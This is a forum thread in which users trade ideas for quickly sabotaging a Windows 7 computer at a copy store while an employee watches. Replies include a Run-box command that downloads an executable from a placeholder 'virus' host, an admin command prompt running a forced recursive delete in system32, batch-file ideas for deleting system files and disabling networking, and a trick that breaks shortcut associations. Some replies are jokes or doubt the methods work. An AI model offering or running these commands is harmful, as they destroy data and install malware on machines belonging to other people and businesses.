Do you think you can hack?

Jaybird

Went to copy store to get a document printed out. Girl asked for my user and pass for my Dropbox where the document was stored. I asked if I could just type my password in, as I don't enter it often and I could get it wrong. She said no, our boss says you could hack the computer in less than 3 seconds.

So my question for tonight. What is the quickest manual hack you can think of and the type of damage you could do?

Guidelines:

the network is hooked up by DSL so downloading a program is not an option.

No thumb drives or external data devices.

Hacking be done using your brain and two hands with a mouse and keyboard.

There is a person watching you so you have to work fast before they reliase you just hacked them.

Operating system is windows 7 on a dell machine.

A batch file made in notepad to do some pretty evil things like deleting system files, disabling the NIC, unclickable rickroll popups etc., it'd only take as long as it would for you to type.

I guess you could plug a usb in but it would be pretty obvious and most pc's at places like this are locked away

This "boss" sounds like they watched Glenn Beck's nonsensical tirade on how Watchdogs is "teaching children how to hack". Try not to hit "Q", they might wet themselves.

If I'm correct though windows file protect prevents this from happening.

CTRL+Rcmdc:\windows\explorer.exe http://virus.tk/x.exe

if the PC can access dropbox, it can download a 25kb virus

you would also have to cd to the file and run it as admin, and that would take too long

win key

cmd

ctrl+shift+enter

del /q /f *

that should start CMD as admin, cd to sys32 by default, then delete all files without a yes/no confirmation

You could try what I did to my self.

Open the start menu > right click on any quick-launch icon > open with (select default program) > navigate to explorer.exe > watch as the system ramps up to 100% and starts thinking about what the fuck you just did. I did this once on my current PC as I was trying to make a single program display the correct icon in the task-bar (I am a smart one). It works with any program to a degree, use anything else than exlorer and you will just ruin every shortcut on the desktop and start menu as the will just open in what ever program you selected instead of launching the targeted program..

This seemed to work for me, if you are fast enough this could work. And you don't actually delete anything. You are just opening all the shortcuts on the entire computer using eplorer.

EDIT: I have no how it actually allowed me to do it, but I did.

EDIT2: It would seem that you need to type in the name of a program into the start menu, I typed in adobe, and what do you know I could set adobe readers shortcut to "open with".

Or you could just bring a hatchet and "hack" the computer with one good swing.
